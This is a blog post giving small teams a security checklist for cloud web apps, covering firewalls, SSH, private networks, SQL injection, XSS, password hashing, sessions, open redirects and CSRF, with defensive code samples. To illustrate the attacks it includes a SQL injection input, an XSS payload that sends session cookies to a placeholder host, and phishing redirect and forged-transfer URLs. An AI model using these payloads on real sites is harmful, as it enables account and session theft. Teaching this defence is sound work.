Hartley Brody

Startup Security Guide: Minimum Viable Security Checklist for a Cloud-Based Web Application

The internet can be a scary place. I learned this the hard way when I built my first website back in 2008 and promptly had my guestbook spammed by waves of bots.

Since then, I’ve spent a decade building and securing web applications, and learned a lot along the way. While the specific techniques evolve over time, there are some core best practices that are always a good idea to follow whenever you’re putting a service up on the internet.

A checklist of guidelines for securing a new product

This article is written for lone developers or small teams who are interested in making sure they have their bases covered from a security perspective. The focus is mostly on dynamic web applications hosted on cloud services like Amazon Web Services (AWS) or Google Cloud Platform (GCP). It is not meant as an exhaustive guide, just a list of low hanging fruit that you can easily do early on to prevent most major, obvious software security issues.

I’ve organized the guide by starting with the network layer and moving up to the application, since that seems to be how most penetration tests and real world attacks progress.

1. Close All Unnecessary Ports on Your Web Servers

Every open port on a host is a potential foothold into your systems for a remote attacker. Nowadays it’s trivial for an attacker to scan thousands of ports across a wide range of IPs looking for known versions of insecure services (a technique called “banner grabbing”). Once they’ve found a few entry points, it’s easy to search for and run exploits against those services to gain access to the machine.

The operating system of your web server’s VM may come with all sorts of default services – to be helpful! These may include things like FTP servers, proxy servers and more – but if you’re not interested in securing, patching and maintaining those services over time, make sure they’re turned off and hidden from the outside world.

You could use something on the server like iptables, or you could rely on your cloud provider’s firewall product to disallow all traffic to your web servers that’s not on the default ports for HTTP (80) or HTTPS (443).

If you need to leave SSH open for manual server administration, move that to a non-standard port (something besides port 22) to avoid naive crawlers and script kiddies constantly banging on the door.

2. Properly Secure the SSH Connections to Your Web Servers

One day, when you’re a big company with a huge cloud infrastructure team, you’ll have all sorts of automation set up and you won’t ever need to manually administer servers over SSH. You’ll treat them like cattle, not pets.

But until then, you’re likely going to need SSH access to your machines for manual configuration changes as your infrastructure is still maturing. That’s okay, but here’s how to do it safely.

First things first, you should disable root login. The root user is the biggest target for attackers since it’s both (1) the most common username across servers and (2) the account with the most privileged system access. This makes root a goldmine for anyone trying to gain access to your web servers.

Disabling root SSH access is as simple as adding the following line to the end of your /etc/ssh/sshd_config file on the server (and then restarting the sshd service):

PermitRootLogin no

While you’re in that file, it’s also a great idea to disable password authentication for SSH connections altogether. You can do that by adding the following line (it may already be there and you simply need to un-comment it).

PasswordAuthentication no

Instead, you should be using public keys to control SSH access. If you’ve never used public keys for anything before, it does take a bit of work to set up initially, but it’s very secure and much easier to manage in the long run.

Make sure you add each teammate’s public key to the ~/.ssh/authorized_keys file for the SSH user you’ll be using. This also makes it easy to revoke someone’s access down the line. Simply remove their laptop’s public key from the ~/.ssh/authorized_keys file and they’ll be locked out – no need to rotate SSH passwords and force everyone else to change.

3. Hide Your Backing Services from the Internet

If you’re following my MVP scalable architecture (which you should be!), you’ll have your database server running on a separate host from your web server(s). You want to ensure that your application’s backing services – like the database, and any caching layers like redis or memcached – cannot be accessed by someone outside your trusted network.

At the very least, drop all traffic that isn’t coming from a whitelist of your web servers’ IP addresses. However, this can quickly become a pain to maintain manually if you’re adding or removing web servers a lot.

An even better approach is to put all of the backing services hosts in a private network that can’t be seen from outside of the network. You can usually set this up as a Virtual Private Cloud (VPC) with any cloud provider like Google Cloud or AWS.

In fact, this is the exact use-case that AWS spells out for a VPC on their marketing homepage:

For example, you can create a public-facing subnet for your web servers that has access to the Internet, and place your backend systems such as databases or application servers in a private-facing subnet with no Internet access.

Note that you should still require passwords for access to your backing services on top of all of this, as an extra layer of defense in case an attacker gets inside your network.

4. Never Serve Files Off the Web Server’s File System

There’s really no reason you should ever be serving files directly off of the file system from your web servers these days.

There are all sorts of ways to accidentally misconfigure things and allow anyone to traverse the source code or other contents of your web server’s file system. Save yourself the headache and avoid using things like nginx’s root directive or Apache’s DocumentRoot directive in your frontend web server. In fact, the nginx docs on “common mistakes” specifically list a few bad uses of the root directive – take heed!

This is a performance recommendation as much as it is a security recommendation. Static resources like CSS, javascript and images that belong to your application should be hosted on a more-fitting static file host like AWS S3 or Google’s Cloud Storage.

5. Serve User Generated Content on a Different Domain

Continuing the last point, the other place where applications can get into trouble with serving static files is when they’re serving user-generated content like uploaded profile pictures or document attachments.

Make sure you serve any user-uploaded content from a completely different domain from your main application. Many big sites already do this:

  • facebook uses fbcdn.net
  • github uses githubusercontent.com
  • twitter uses pbs.twimg.com

If users can upload HTML documents and have them hosted on your application’s primary domain, that’s an excellent way to set up phishing opportunities for attackers. Serving user content from your domain can also fool users into thinking malicious content is actually legitimate content from your company, as the FCC found out last fall.

Users could upload malicious javascript that would be run by the browser with the same trust level as your application’s javascript code, allowing it to tamper with your site’s cookies and potentially steal users’ credentials, sessions or other data.

6. Avoid SQL Injections (SQLI) By Properly Using an ORM

For the transactional needs of the average relational database, there’s no reason not to be using an Object Relational Mapper (ORM) to interface with your database.

An ORM saves you from having to write a ton of boilerplate code for mundane tasks like generating SQL statements and turning database rows into objects you can easily work with in code.

From a security standpoint, an ORM will also save you from SQL injection attacks (SQLI), where a malicious user might try to extract information from your database by creating malicious payloads.

Imagine a web application with a URL like: http://example.com/user/123. The code that runs on a request for that page will probably grab the user ID from the URL and use it to look up the user, running a SQL query that looks like

SELECT * FROM users WHERE id = 123

Now imagine a malicious user were to navigate to a specially crafted URL such as http://example.com/user/NULL+OR+1=1. Without proper escaping, the server would generate a SQL expression like this and send that off to the database.

SELECT * FROM users WHERE id = NULL OR 1=1

Because of the “OR 1=1”, that WHERE clause would match every single row in the users table, meaning the database would return a list of every user and the results may be rendered to the page. Not ideal!

An ORM would turn that into the following safe query, which would simply match no rows.

"SELECT * FROM users WHERE id = %s", ("NULL OR 1=1",)

If you do have a special use-case that your ORM doesn’t support and you find yourself having to write raw SQL, always ensure that you’re using prepared statements or parameterized queries and never manually building SQL statements with string concatenation or variable substitution.
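To make this concrete, here’s a minimal sketch using Python’s built-in sqlite3 module standing in for a full ORM – the `?` placeholder is the same parameterized-query mechanism an ORM uses under the hood. The table and data are made up for illustration.

```python
import sqlite3

# In-memory database with a couple of demo users.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])

def get_user(user_id):
    # The "?" placeholder means the user-supplied value is sent to the
    # database as data -- it's never spliced into the SQL text itself.
    return conn.execute(
        "SELECT * FROM users WHERE id = ?", (user_id,)
    ).fetchone()

# A normal lookup works as expected...
print(get_user(1))           # (1, 'alice')

# ...while an injection payload is treated as one literal (nonsense)
# value and matches nothing, instead of matching every row.
print(get_user("1 OR 1=1"))  # None
```

The same principle applies whatever database driver you use: pass values as parameters, never via string concatenation.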

7. Avoid Cross-Site Scripting (XSS) by Using an HTML Template Library

You should be using a template library for rendering HTML documents and automatically escaping HTML characters. Like an ORM, a good template library not only saves you the hassle of writing lots of boilerplate code, it also adds some security benefits.

In any dynamically generated web application, user-generated content will be mixed in directly with the HTML you’ve written for your application to render the page.

Without proper XSS filters, a user could set their username to something like the following (what a mouthful!):

<script>i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();</script>

Then, whenever a user navigated to that attacker’s profile, your backend would combine that “username” with the rest of the HTML on the page. The attacker’s payload would be run and trusted by the user’s browser as if it were javascript from your application and users would unknowingly have their session cookies sent to an attacker’s server. Not ideal!

A proper template library would turn the above code into

&lt;script&gt;i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();&lt;/script&gt;

rendering it invalid as an HTML <script> tag and harmless (and weird looking) to users.
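Python’s built-in html.escape shows the transformation that a good template library applies automatically on every render – this is just the escaping step in isolation, with a shortened payload:

```python
import html

# A malicious "username" containing a script payload.
payload = "<script>alert(document.cookie)</script>"

# html.escape replaces the characters that carry meaning in HTML
# (<, >, &, and quotes) with their entity equivalents.
safe = html.escape(payload)
print(safe)
# &lt;script&gt;alert(document.cookie)&lt;/script&gt;
```

The browser renders the escaped version as inert text, so the payload never executes.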

From time to time, you may find yourself needing to disable the default escaping in order to leave information properly formatted for the frontend – say, if you’re “rendering” some JSON on the server in order to pass it to javascript on the frontend.

Admittedly, I once wrote a security bug for a client while doing exactly that. While we were initially only passing “trusted” content that I assumed would be safe to render, the page evolved over time and we added some user-generated content to that JSON, which created a potential XSS vulnerability.

XSS bugs are the most common type of security vulnerability across all industries according to HackerOne’s latest report, and they can sneak in over time if you’re not careful.

8. Hash and Salt Your Users’ Passwords

If this is the first time you’re hearing someone say this, you should hang out on web development forums more often, because this is one of the most common – and costly – mistakes made by new or junior web developers.

There’s no reason to ever store your users’ passwords in plaintext in your database. The current state of the art is to add a random, unique salt to each password and then run the combination through a deliberately slow, repeated hashing algorithm like bcrypt. But really, you should use a library for this that comes with sane defaults.

Never try to build your own crypto systems, and that goes for password security as well.
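To see the moving parts, here’s a sketch using only Python’s standard library – PBKDF2 stands in for bcrypt here since bcrypt requires a third-party package, and in a real app you should reach for a maintained password-hashing library rather than wiring this up yourself:

```python
import hashlib
import hmac
import os

def hash_password(password):
    # A random 16-byte salt, unique per password.
    salt = os.urandom(16)
    # A slow, repeated hash (600k iterations of PBKDF2-SHA256) makes
    # brute-forcing stolen hashes expensive.
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    # Constant-time comparison avoids leaking timing information.
    return hmac.compare_digest(candidate, digest)

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("wrong guess", salt, digest))                   # False
```

Note that you store the salt alongside the digest – the salt isn’t a secret, it just ensures identical passwords produce different hashes.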

9. Require Your Users to Create Strong Passwords

This one may not seem like it should be part of an application or network security checklist – if the user makes a bad password and gets hacked, that’s their fault! Right?

If users are getting their accounts compromised, it’s going to reflect poorly on your application, regardless of whose fault it is.

Forget about funky password requirements like mixing cases, requiring numbers, or anything complex like that. Those are old standards that are now outdated.

Instead, set a minimum length of something like 8-12 characters (no max length limit – we are storing fixed-length hashes (#8) in our DB, after all!) and then check any new passwords against a database of the most common passwords found in breaches.

That should take all of one hour to implement and will help minimize the success of any brute-force password guessing attacks against your product.
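A sketch of that check in Python – the tiny COMMON_PASSWORDS set here is a placeholder for a real breach corpus, and the minimum length is one reasonable choice, not a standard:

```python
# A stand-in for a real breached-password list -- in practice you'd
# load a large dataset of passwords found in public breaches.
COMMON_PASSWORDS = {"password", "123456789", "qwertyuiop", "iloveyou1"}

def is_acceptable_password(password):
    # Minimum length only -- no composition rules, no maximum length.
    if len(password) < 10:
        return False
    # Reject anything that shows up in known breach dumps.
    if password.lower() in COMMON_PASSWORDS:
        return False
    return True

print(is_acceptable_password("short"))           # False -- too short
print(is_acceptable_password("qwertyuiop"))      # False -- common password
print(is_acceptable_password("purple-tuba-94"))  # True
```

Rejecting known-breached passwords does far more against credential stuffing than any mixed-case-plus-digit rule.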

10. Serve Your Site Over SSL

Serving your site over SSL protects your site’s users from having their connections tampered with – either by an attacker on their network (say, a public wifi hotspot) or some intermediary along the line, like a rogue Internet Service Provider (ISP).

If you’re not familiar with how SSL works, you can learn what you need to know here. Serving your site over SSL also has SEO benefits as Google has said it uses SSL (as well as page load time) as a ranking signal when deciding what sites to return in the results for a query.

You can get a free SSL certificate from Let’s Encrypt and it takes only a few minutes to set up with their certbot, so the benefits far outweigh the minimal costs of setting one up.

This is much easier if you simply serve your site over SSL from day one, rather than trying to migrate later: you’ll catch any mixed content warnings as you add new content to the site over time, instead of having to go back and fix them all at once.

11. Don’t Use Cookies for Session Storage

Server-side sessions are a common feature of many web application frameworks. The idea is you can tuck some information “into the session” and it will be available again later for subsequent requests from that same user.

By default, some session implementations simply store the session values that your application sets in a cookie on the user’s browser, maybe base64 encoding it for “obfuscation” purposes.

But if you’re putting anything remotely sensitive in your session (say, the currently logged in user’s ID), then you don’t want to be trusting a user-editable cookie for something like that. A user could edit the cookie to change the ID and suddenly your application will give them access to another user’s account. Not ideal!

Instead, make sure you’ve configured a proper server-side session storage backend – something like a database or a cache service – and keep the session data in there.

You’ll still likely need to use cookies, but there’s an important distinction between using cookies to identify a user’s session versus using them to store information about the session.

In an ideal setup, you’ll simply set a cookie in the user’s browser called “session_id” and it will contain some long, unique value (like a UUID) that will be that user’s unique session identifier. When a request comes in, your session management system should look up that user’s session information in a backend system (like a database or cache) using the session ID in the cookie.

You should make sure to inspect the cookies that your site is generating – login using an incognito browser to see what ends up getting set as you browse the site and perform various tasks. You shouldn’t see anything valuable sent to or from the browser.
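Here’s a minimal sketch of that setup in Python, with a plain dict standing in for a real backend like redis or a database – the function names are illustrative:

```python
import secrets

# An in-memory dict stands in for the real server-side storage backend.
SESSION_STORE = {}

def create_session(user_id):
    # The only thing that ever reaches the browser is this opaque,
    # unguessable identifier -- never the session data itself.
    session_id = secrets.token_urlsafe(32)
    SESSION_STORE[session_id] = {"user_id": user_id}
    return session_id

def load_session(session_id):
    # Unknown or tampered-with IDs simply miss the store -- there's
    # nothing inside the cookie for a user to edit.
    return SESSION_STORE.get(session_id)

sid = create_session(user_id=42)
print(load_session(sid))              # {'user_id': 42}
print(load_session("forged-cookie"))  # None
```

Because the session data never leaves the server, a user who edits their cookie can only produce an ID that doesn’t exist, not a session belonging to someone else.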

12. Don’t Allow Open Redirects

Any page of your application that can respond with a redirect (say, a login page or error page) should never blindly redirect a user to a fully qualified URL. Instead, try to return a path-only Location header that keeps the user on the same domain.

The vulnerability here is that a malicious user could create a targeted phishing campaign against your site. They could set up a copy of your site on a different domain and then send someone a link to the open redirector page on your site with a query argument that redirects to the attacker’s site.

Since users usually scan the domain but not the query arguments when deciding to trust a link, they’ll think the link is legitimate even though you redirected them to an attacker’s website.

This attack is particularly sneaky if it comes after a login page. Imagine someone sent one of your users a link to a URL like the following (with illustrative domains):

http://example.com/login?next=http://attacker-site.com/

The user would be taken to your actual login page, where they would successfully log in, and then be redirected to the next query argument – which, in this case, takes them off your site to a page the attacker controls.

If the attacker sets it up to look like your site, the user may be none the wiser if they don’t check the URL bar after logging in, and may be tricked into giving up information (“Please enter your password one more time…”).
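One way to enforce the path-only rule is to validate the next parameter before redirecting. This sketch uses Python’s standard urllib.parse; the helper name and fallback are assumptions, not a complete allowlist scheme:

```python
from urllib.parse import urlparse

def safe_redirect_target(next_url, default="/"):
    # Only allow relative paths within our own site. Anything with a
    # scheme or network location ("http://evil.example", "//evil.example")
    # falls back to the default.
    parsed = urlparse(next_url)
    if parsed.scheme or parsed.netloc:
        return default
    if not parsed.path.startswith("/"):
        return default
    return parsed.path

print(safe_redirect_target("/dashboard"))               # /dashboard
print(safe_redirect_target("http://attacker.example"))  # /
print(safe_redirect_target("//attacker.example/login")) # /
```

Note the protocol-relative `//host` form: it has no scheme but still sends the browser off-site, which is why the check looks at netloc as well.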

13. Use CSRF Tokens on Important Form Submissions

As the name implies, a “Cross-Site Request Forgery” is when an attacker on one site is able to trick a user into submitting a forged request on your site without the user realizing.

The canonical example is a bank transfer. If you’re a bank and you allow users to transfer funds with a request like

GET http://www.example.com/transfer_funds?amt=500&to_acct=12345

then a malicious attacker could simply embed a link like that somewhere innocuous – say, behind a “Click here to win a free iPad!” link on facebook. If a logged-in user of your site sees the link on another site and clicks on it, they will have transferred the funds before they even realize what has happened.

The way you prevent this from happening on your site is by including so-called “CSRF tokens” in your forms. The basic implementation is that you generate a random CSRF token when you load the page that asks the user to submit or confirm some sort of transaction. You would hide this value in the HTML of the form using something like:

<input type="hidden" name="csrf_token" value="..." />

Then, when the user submits the form to confirm the transaction, you would check for both the presence of the CSRF token and whether it matches the previously set value before allowing the request to process. In this way, an attacker embedding the example “bank transfer” link would hit a dead end: your application would reject the request because it doesn’t have a correct CSRF token value.
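A minimal Python sketch of issuing and checking a token, with a plain dict standing in for the server-side session from #11 – most web frameworks ship this machinery built in, so this is just the idea, not something to hand-roll in production:

```python
import hmac
import secrets

# Stand-in for the user's server-side session record.
session = {}

def issue_csrf_token():
    # Generated when the form page is rendered, then embedded in the
    # hidden <input> field shown above.
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def is_valid_csrf_token(submitted):
    expected = session.get("csrf_token")
    # compare_digest gives a constant-time comparison.
    return expected is not None and hmac.compare_digest(expected, submitted)

token = issue_csrf_token()
print(is_valid_csrf_token(token))    # True  -- legitimate form post
print(is_valid_csrf_token("a" * 64)) # False -- forged request
```

An attacker’s page can’t read the token out of your form (thanks to the browser’s same-origin policy), so a forged request arrives without it and gets rejected.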

If you follow these steps, you will have a very secure base for launching and growing your product. All of your application’s data will be hidden from the public internet and your web servers will be locked down to only handle very specific types of traffic.

Your application will be secure against the most common vulnerabilities as well as some newer, more targeted phishing campaigns. You’ll be taking solid precautions to safeguard your users’ data and creating a secure experience for them in your app.

As your application begins to process a greater number of users and their data, there will be additional security steps you’ll want to think about down the line, but these steps that I’ve listed are the most basic ones that are easy to setup and should last you for a long time.

If you’re interested in learning more about securing web applications, I’d be remiss if I didn’t tell you about the Open Web Application Security Project (OWASP) “Top 10” guidelines that came out last year, although I’ve found it’s a bit too dense to be of much practical use to a lone developer or a small software team.

If you’d like to talk more about this stuff, drop me a line! 🎣

Discussion on reddit.